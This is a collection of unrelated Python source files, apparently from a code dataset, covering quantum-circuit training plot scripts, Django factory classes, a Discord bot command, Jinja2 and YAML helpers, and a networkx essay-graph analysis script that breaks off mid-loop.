# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.05)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.075)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('3q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.05)
# runs.append(0)
'''
FOUR QUBITS
'''
# N_epochs.append(200)
# learning_rate.append(0.005)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.007)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Quantum')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.005)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.007)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(200)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('4q-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# CompareKernelsPlot(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, 'tv', runs, legend = True)
# ###################################################################################################################
# #Automatic Compilation
# ###################################################################################################################
def PlotAutomaticCompilation(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type1, cost_func, qc, score,
stein_eigvecs1, stein_eta, sinkhorn_eps, runs, comparison, legend = True):
'''This function reads output information from a file, relating to automatric compilation of circuits, and plots'''
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type1, cost_func, qc, score,
stein_eigvecs1, stein_eta, sinkhorn_eps, runs)
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps)
cost_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
print('Average files not found')
pass
x = np.arange(0, N_epochs-1, 1)
if comparison.lower() == 'tv':
if cost_func.lower() == 'sinkhorn':
plot_colour = 'b'
# plt.errorbar(x, average_loss['TV'], cost_error, None,\
# '%s' %(plot_colour), label =r'Sinkhorn with Hamming cost'+ '\n'\
# + r'$\eta_{init}$ = %.3f, $\epsilon$ = %.3f.' %( learning_rate, sinkhorn_eps),\
# capsize=1, elinewidth=1, markeredgewidth=2)
x_sink = np.arange(0, len(average_loss['TV']))
plt.plot(x_sink, average_loss['TV'],label ='Sinkhorn using Hamming cost,'+'\n'+ r'$\eta_{init}$ = %.3f, $\epsilon$ = %.3f.' % (learning_rate, sinkhorn_eps) )
plt.fill_between(x_sink, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.3)
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'cost':
try:
if cost_func.lower() == 'sinkhorn':
train_error = np.vstack((lower_error[('Sinkhorn', 'Train')], upper_error[('Sinkhorn', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Sinkhorn', 'Test')], upper_error[('Sinkhorn', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
if cost_func.lower() == 'sinkhorn':
plot_colour = 'b'
x_sink = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x_sink, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour,\
label =r'Sinkhorn on training set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.3, facecolor='b')
plt.plot(x_sink, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour,\
label =r'Sinkhorn on test set using Hamming cost, $\eta_{init}$ = %.3f.' % learning_rate )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3)
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Train')], train_error, None,\
# '%so-' %(plot_colour), label =r'Sinkhorn on training set',\
# capsize=1, elinewidth=1, markeredgewidth=2)
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Test')], test_error, None,\
# '%s-' %(plot_colour), label =r'Sinkhorn on test set',\
# capsize=1, elinewidth=1, markeredgewidth=2)
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'probs':
fig, axs = plt.subplots()
axs.clear()
x = np.arange(len(data_probs_final))
axs.bar(x, data_probs_final.values(), width=0.2, color= 'k' , align='center')
axs.bar(x-(0.2*(0+1)), born_final_probs.values(), width=0.2, color='b', align='center')
axs.legend((r'$\mathsf{IQP}$ Data',r'$\mathsf{QAOA}$ $\mathsf{IBM}$ with Sinkhorn.'), fontsize = 20)
axs.set_xticks(range(len(data_probs_final)))
axs.set_xticklabels(list(data_probs_final.keys()),rotation=70)
plt.show()
return
'''TWO QUBITS'''
# N_epochs = 200
# learning_rate = 0.002
# data_type = 'Quantum_Data'
# data_circuit = 'IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type ='Gaussian'
# cost_func = 'Sinkhorn'
# qc = '2q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 0.1
# runs = 0
'''THREE QUBITS'''
# N_epochs = 200
# learning_rate = 0.005
# data_type = 'Quantum_Data'
# data_circuit = 'IQP'
# N_born_samples = 500
# N_data_samples = 500
# N_kernel_samples = 2000
# batch_size = 250
# kernel_type ='Gaussian'
# cost_func = 'Sinkhorn'
# qc = '3q-qvm'
# score = 'Approx'
# stein_eigvecs = 3
# stein_eta = 0.01
# sinkhorn_eps = 0.1
# runs = 0
# PlotAutomaticCompilation(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'probs', legend = True)
def CompareCostFunctionsonQPU(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs, comparison, legend = True):
loss, born_final_probs, data_probs_final = ReadFromFile(N_epochs, learning_rate, data_type, data_circuit,
N_born_samples, N_data_samples, N_kernel_samples,
batch_size, kernel_type, cost_func, qc, score,
stein_eigvecs, stein_eta, sinkhorn_eps, runs)
N_trials = len(N_epochs)
if comparison.lower() == 'probs':
plot_colour = ['g*-', 'y*-', 'bo-', 'co-']
fig, axs = plt.subplots()
data_plot_colour = 'k'
bar_plot_colour = ['g','y', 'b', 'c']
patterns = [ "o" , ""]
axs.clear()
#Plot Data
x = np.arange(len(data_probs_final[0]))
axs.bar(x, data_probs_final[0].values(), width=0.1, color= '%s' %data_plot_colour, align='center')
#Plot MMD One
axs.bar(x-(0.2*(0+1)), born_final_probs[1].values(), width=0.1, color='%s' %(bar_plot_colour[0]), align='center')
axs.bar(x-(0.2*(0+0.5)), born_final_probs[0].values(), width=0.1, color='%s' %(bar_plot_colour[1]), align='center')
#Plot Sinkhorn
axs.bar(x-(0.2*(0+2)), born_final_probs[3].values(), width=0.1, color='%s' %(bar_plot_colour[2]), align='center')
axs.bar(x-(0.2*(0+1.5)), born_final_probs[2].values(), width=0.1, color='%s' %(bar_plot_colour[3]), align='center')
# axs.set_xlabel("Outcomes", fontsize=20)
# axs.set_ylabel("Probability", fontsize=20)
axs.legend(('Data',r'\textsf{MMD}, on %s' %qc[0], r'\textsf{MMD}, on %s' %qc[1], r'Sinkhorn, on %s' %qc[2], r'Sinkhorn, on %s' %qc[3] ), fontsize = 20)
axs.set_xticks(range(len(data_probs_final[0])))
axs.set_xticklabels(list(data_probs_final[0].keys()),rotation=70)
plt.show()
elif comparison.lower() == 'tv':
plot_colour = ['g*-', 'y*-', 'bo-', 'co-']
fig, ax = plt.subplots()
for trial in range(N_trials):
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
cost_error = np.vstack((lower_error['TV'], upper_error['TV'])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
x = np.arange(0, N_epochs[trial]-1, 1)
if cost_func[trial].lower() == 'mmd':
ax.plot(x, average_loss['TV'], '%s' %(plot_colour[trial]), label =r'\textsf{MMD}, on %s.' % qc[trial] )
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='%s' %plot_colour[trial][0])
# axins.plot(x, average_loss['TV'], 'r%s-' %plot_markers[trial], \
# label =r'MMD for $\kappa_{%s}$, $\eta_{init}$ = %.3f.' %(kernel_type[trial][0], learning_rate[trial]) )
elif cost_func[trial].lower() == 'sinkhorn':
x_sink = np.arange(0, len(average_loss['TV']))
ax.plot(x_sink, average_loss['TV'], '%s' %(plot_colour[trial]), label =r'Sinkhorn, on %s.' %qc[trial])
ax.fill_between(x, average_loss['TV'] - lower_error['TV'], average_loss['TV'] + upper_error['TV'], alpha=0.2, facecolor='%s' %plot_colour[trial][0])
plt.legend(loc='best', prop={'size': 20})
plt.show()
elif comparison.lower() == 'cost':
for trial in range(N_trials):
try:
average_loss, upper_error, lower_error = AverageCostsFromFile(N_epochs[trial], learning_rate[trial], data_type[trial], data_circuit[trial],
N_born_samples[trial], N_data_samples[trial], N_kernel_samples[trial],
batch_size[trial], kernel_type[trial], cost_func[trial], qc[trial], score[trial],
stein_eigvecs[trial], stein_eta[trial], sinkhorn_eps[trial])
if cost_func[trial].lower() == 'mmd':
train_error = np.vstack((lower_error[('MMD', 'Train')], upper_error[('MMD', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('MMD', 'Test')], upper_error[('MMD', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
elif cost_func[trial].lower() == 'stein':
train_error = np.vstack((lower_error[('Stein', 'Train')], upper_error[('Stein', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Stein', 'Test')], upper_error[('Stein', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
elif cost_func[trial].lower() == 'sinkhorn':
train_error = np.vstack((lower_error[('Sinkhorn', 'Train')], upper_error[('Sinkhorn', 'Train')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
test_error = np.vstack((lower_error[('Sinkhorn', 'Test')], upper_error[('Sinkhorn', 'Test')])) #Stack errors into (2d, N_epochs) array for numpy errorbar function
except:
pass
if cost_func[trial].lower() == 'mmd':
if qc[trial].lower()[8] == '3':
plot_colour = ['g', 'y']
elif qc[trial].lower()[8] == '4':
plot_colour = ['g', 'y']
x_mmd = np.arange(0, len(average_loss['MMD', 'Train']))
plt.plot(x_mmd, average_loss['MMD', 'Train'],'%s*-' % plot_colour[trial],\
label =r'\textsf{MMD} on training set for %s' %qc[trial] )
plt.fill_between(x_mmd, average_loss['MMD', 'Train'] - lower_error['MMD', 'Train'],\
average_loss['MMD', 'Train'] + upper_error['MMD', 'Train'], alpha=0.5, facecolor='%s' %plot_colour[trial])
plt.plot(x_mmd, average_loss['MMD', 'Test'],'%s-' % plot_colour[trial],\
label =r'\textsf{MMD} on test set for %s' %qc[trial] )
plt.fill_between(x_mmd, average_loss['MMD', 'Test'] - lower_error['MMD', 'Test'],\
average_loss['MMD', 'Test'] + upper_error['MMD', 'Test'], alpha=0.3, facecolor='%s' %plot_colour[trial])
# x_mmd = np.arange(0, len(average_loss['MMD', 'Train']))
# plt.errorbar(x_mmd, average_loss[('MMD', 'Train')], train_error, None,\
# '%sx-' %(plot_colour[trial]), label =r'MMD on %s.' \
# %qc[trial], capsize=1, elinewidth=1, markeredgewidth=2)
# plt.errorbar(x_mmd, average_loss[('MMD', 'Test')], test_error, None,\
# '%s-' %(plot_colour[trial]), label =r'MMD on %s.' \
# %(qc[trial]),capsize=1, elinewidth=1, markeredgewidth=2)
# r'MMD Loss $\mathcal{L}_{\mathsf{MMD}}$', fontsize = 20)
elif cost_func[trial].lower() == 'sinkhorn':
if qc[trial].lower()[8] == '3':
plot_colour = ['b', 'c']
elif qc[trial].lower()[8] == '4':
plot_colour = ['b', 'c']
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Train')], train_error, None,\
# '%sx-' %(plot_colour[trial]), label =r'Sinkhorn, on %s.' \
# %(qc[trial]),\
# capsize=1, elinewidth=1, markeredgewidth=2)
# plt.errorbar(x_sink, average_loss[('Sinkhorn', 'Test')], test_error, None,\
# '%s-' %(plot_colour[trial]), label =r'Sinkhorn, on %s.' \
# %(qc[trial]),\
# capsize=1, elinewidth=1, markeredgewidth=2)
x_sink = np.arange(0, len(average_loss['Sinkhorn', 'Train']))
plt.plot(x_sink, average_loss['Sinkhorn', 'Train'],'%so-' % plot_colour[trial],\
label =r'Sinkhorn on training set for %s' %qc[trial] )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Train'] - lower_error['Sinkhorn', 'Train'],\
average_loss['Sinkhorn', 'Train'] + upper_error['Sinkhorn', 'Train'], alpha=0.5, facecolor='%s'%plot_colour[trial])
plt.plot(x_sink, average_loss['Sinkhorn', 'Test'],'%s-' % plot_colour[trial],\
label =r'Sinkhorn on test set for %s' %qc[trial] )
plt.fill_between(x_sink, average_loss['Sinkhorn', 'Test'] - lower_error['Sinkhorn', 'Test'],\
average_loss['Sinkhorn', 'Test'] + upper_error['Sinkhorn', 'Test'], alpha=0.3, facecolor='%s'%plot_colour[trial])
plt.legend(loc='best', prop={'size': 20})
plt.show()
return
[N_epochs, learning_rate, data_type, data_circuit, N_born_samples, N_data_samples, N_kernel_samples, batch_size, kernel_type, \
cost_func, qc, score, stein_eigvecs, stein_eta, sinkhorn_eps, runs] = [[] for _ in range(16)]
'''#################################'''
'''ON CHIP ASPEN-4-3Q-A'''
'''#################################'''
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-3Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-3Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-3Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.2)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-3Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.3)
# runs.append(0)
# CompareCostFunctionsonQPU(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'cost', legend =True)
'''#################################'''
'''ON CHIP ASPEN-4-4Q-A'''
'''#################################'''
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-4Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('MMD')
# qc.append('Aspen-4-4Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-4Q-A')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# N_epochs.append(100)
# learning_rate.append(0.01)
# data_type.append('Bernoulli_Data')
# data_circuit.append('IQP')
# N_born_samples.append(500)
# N_data_samples.append(500)
# N_kernel_samples.append(2000)
# batch_size.append(250)
# kernel_type.append('Gaussian')
# cost_func.append('Sinkhorn')
# qc.append('Aspen-4-4Q-A-qvm')
# score.append('Approx')
# stein_eigvecs.append(3)
# stein_eta.append(0.01)
# sinkhorn_eps.append(0.08)
# runs.append(0)
# CompareCostFunctionsonQPU(N_epochs, learning_rate, data_type, data_circuit,
# N_born_samples, N_data_samples, N_kernel_samples,
# batch_size, kernel_type, cost_func, qc, score,
# stein_eigvecs, stein_eta, sinkhorn_eps, runs, 'tv', legend =True)
| StarcoderdataPython |
21303 | <filename>joplin/pages/official_documents_page/factories.py
import factory
from pages.official_documents_page.models import OfficialDocumentPage, OfficialDocumentCollectionOfficialDocumentPage
from pages.base_page.factories import JanisBasePageFactory
from pages.official_documents_collection.factories import OfficialDocumentCollectionFactory
from wagtail.documents.models import Document
class DocumentFactory(factory.DjangoModelFactory):
@classmethod
def create(cls, *args, **kwargs):
return super(DocumentFactory, cls).create(*args, **kwargs)
class Meta:
model = Document
class OfficialDocumentCollectionDocumentFactory(factory.django.DjangoModelFactory):
page = factory.SubFactory(
'official_documents_page.factories.OfficialDocumentPageFactory',
add_departments__dummy=False,
)
official_document_collection = factory.SubFactory(
OfficialDocumentCollectionFactory,
add_departments__dummy=False,
)
class Meta:
model = OfficialDocumentCollectionOfficialDocumentPage
class OfficialDocumentPageFactory(JanisBasePageFactory):
class Meta:
model = OfficialDocumentPage
# document = factory.SubFactory(
# DocumentFactory
# )
@factory.post_generation
def add_official_document_collection(self, create, extracted, **kwargs):
if extracted:
# A list of official document collections were passed in, use them
for collection in extracted['official_document_collection']:
OfficialDocumentCollectionDocumentFactory.create(page=self, official_document_collection=collection)
return
# pass "add_topics__dummy"=True into Factory() to make dummy document collections
if create:
if kwargs.get("dummy", False):
OfficialDocumentCollectionFactory.create_batch(2, page=self)
| StarcoderdataPython |
140501 | <reponame>federicober/funk-lines
"""File for the results class."""
import statistics
from typing import List, Optional, Sequence
from .ast_processors import StmtInfo
class Results:
"""Class for holding the results of an analysis.
The Analyser classes return a Result object.
"""
def __init__(self, total_lines: int, definitions: Sequence[StmtInfo]):
"""Result constructor.
Args:
total_lines: Total number of lines
definitions: Sequence of functions and classes
"""
self._total_lines: int = total_lines
self._definitions: List[StmtInfo] = list(definitions)
@property
def total_lines(self) -> int:
"""Total number of lines."""
return self._total_lines
@property
def nbr_definitions(self) -> int:
"""Total number of functions and classes."""
return len(self._definitions)
@property
def definitions(self) -> List[StmtInfo]:
"""List of statement info objects for all functions and classes."""
return self._definitions.copy()
@property
def lines_per_function(self) -> Optional[float]:
"""Mean number of lines per definition."""
if self._definitions:
return statistics.mean(def_.n_lines for def_ in self._definitions)
return None
def __add__(self, other: "Results") -> "Results":
"""Combines two results.
Args:
other: another Result object
Returns:
Combined results
"""
return self.__class__(
total_lines=self.total_lines + other.total_lines,
definitions=self._definitions + other.definitions,
)
| StarcoderdataPython |
1736665 | import asyncio
from discord.ext import commands
from discord_slash import SlashContext, cog_ext
class Ping(commands.Cog):
def __init__(self, bot):
self.bot = bot
asyncio.create_task(self.bot.slash.sync_all_commands())
def cog_unload(self):
self.bot.slash.remove_cog_commands(self)
@cog_ext.cog_slash(name='ping', description='このBotのレイテンシを返します。')
async def slash_say(self, ctx: SlashContext):
msg = await ctx.send('pong!')
await msg.edit(content=f"pong!\n`{self.bot.ws.latency * 1000:.0f}ms`")
def setup(bot):
bot.add_cog(Ping(bot))
| StarcoderdataPython |
189289 | # Via http://pydanny.com/jinja2-quick-load-function.html
from jinja2 import FileSystemLoader, Environment, StrictUndefined
def render_from_template(directory, template_name, **kwargs):
loader = FileSystemLoader(directory)
env = Environment(loader=loader, undefined=StrictUndefined)
template = env.get_template(template_name)
return template.render(**kwargs)
if __name__ == "__main__":
import os
import sys
import yaml
if len(sys.argv) > 1:
filename = sys.argv[2]
thisdir = os.path.dirname(os.path.join(os.getcwd(), filename))
else:
filename = "remotes.yaml"
thisdir = os.path.dirname(__file__)
with open(os.path.join(thisdir, filename)) as f:
params = yaml.load(f.read())
for filename in [
"remote.lua",
#"layout.xml.jinja2",
]:
with open(os.path.join(thisdir, filename), "w") as f:
f.write(render_from_template(thisdir, "%s.jinja2" % filename, **params))
| StarcoderdataPython |
1751642 | import os
import yaml
class Project(object):
def __init__(self, data, source=None, dir=None, annotation=None):
self.data = data
self.source = source
self.dir = dir
self.annotation = annotation
self.command_line_flags = []
self.command_line_profiles = []
def attr(self, name, default=None):
return self.data.get(name, default)
def sections(self, heading):
sections = self.data.get(heading, {})
keys = list(sections.keys())
keys.sort()
return [Section([heading, key], sections[key], self) for key in keys]
def section(self, heading, key):
data = self.data.get(heading, {}).get(key)
if data:
return Section([heading, key], data, self)
else:
return None
def default_section(self, heading):
sections = self.sections(heading)
if len(sections) == 1:
return sections[0]
else:
for s in self.sections(heading):
if s.attr("default") is True:
return s
return None
def flags(self):
return self.data.get("flags", {})
def all_flags(self):
return _merge_flags(
self.command_line_flags,
_resolve_profile_flags(self),
self.flags())
def reload(self):
if self.source:
self.data = _load_data(self.source)
class Section(object):
def __init__(self, path, data, project):
self.path = path
self.data = data
self.project = project
def attr(self, key, default=None):
return self.data.get(key, default)
def flags(self):
return self.attr("flags", {})
def all_flags(self):
return _merge_flags(
self.project.command_line_flags,
_resolve_profile_flags(self.project),
self.flags(),
self.project.flags())
def _merge_flags(*list_of_flags):
merged = []
for flags in list_of_flags:
for name, val in _iter_flags(flags):
if not _has_flag(name, merged):
merged.append((name, val))
return merged
def _iter_flags(flags):
try:
return flags.items()
except AttributeError:
return flags
def _resolve_profile_flags(project):
resolved = []
for profile_name in project.command_line_profiles:
profile = project.section("profiles", profile_name)
if profile:
resolved = _merge_flags(profile.data, resolved)
return resolved
def _has_flag(name, flags):
for flag_name, _ in flags:
if flag_name == name:
return True
return False
def from_dir(path, name="guild.yml"):
return from_file(os.path.join(path, name))
def from_file(path):
return Project(_load_data(path), path, os.path.dirname(path))
def _load_data(path):
with open(path, "r") as f:
return yaml.load(f)
def from_string(s, path="__str__"):
return Project(yaml.load(s), path)
def copy_with_new_data(project, data):
return Project(
data,
project.source,
project.dir,
project.annotation)
| StarcoderdataPython |
3329799 | <filename>networks.py
import pandas as pd
import networkx as nx
import matplotlib.pyplot as plt
import numpy as np
from PNL import *
from progress.bar import Bar
from ast import literal_eval
df = pd.read_csv('data/essays.csv')
df_save = pd.DataFrame(columns=['final_score','c1', 'c2', 'c3', 'c4', 'c5',
'nodes', 'edges', 'out_degrees','clustering_coefficient','shortest_path_lenght',
'shortest_path_lenght_inverse_weighted', 'assortativity', 'density', 'degree_centrality',
'betweenness_centrality', 'closeness_centrality', 'pagerank'])
bar = Bar('Processing', max=len(df))
for index in range(len(df)):
text = df.iloc[index]['text']
nodes = preprocessing_text(text)
edges = [[nodes[i], nodes[i+1]] for i in range(len(nodes)-1)]
G = nx.DiGraph()
G.add_nodes_from(nodes)
G.add_edges_from(edges)
edges_weight = dict((','.join(edge), edges.count(edge)) for edge in edges)
max_weight = max(edges_weight.values())
for u, v, d in G.edges(data=True):
d['weight'] = edges_weight[f'{u},{v}']
d['inverse_weight'] = 1 / edges_weight[f'{u},{v}']
nodes_count = G.number_of_nodes()
edges_count = G.number_of_edges()
out_degrees = dict(G.out_degree(G.nodes(), 'weight'))
mean_out_degrees = np.mean(list(out_degrees.values()))
clustering_coefficient = nx.clustering(G, G.nodes())
mean_clustering_coefficient = np.mean(list(clustering_coefficient.values()))
average_shortest_path_inverse_weight = nx.average_shortest_path_length(G, 'inverse_weight')
average_shortest_path = nx.average_shortest_path_length(G)
assortativity = nx.degree_assortativity_coefficient(G, x='out', y='out', weight='weight')
density = nx.density(G)
degree_centrality = nx.out_degree_centrality(G)
mean_degree_centrality = np.mean(list(degree_centrality.values()))
betweenness_centrality = nx.betweenness_centrality(G, endpoints=True)
mean_betweenness_centrality = np.mean(list(betweenness_centrality.values()))
closeness_centrality = nx.closeness_centrality(G)
mean_closeness_centrality = np.mean(list(closeness_centrality.values()))
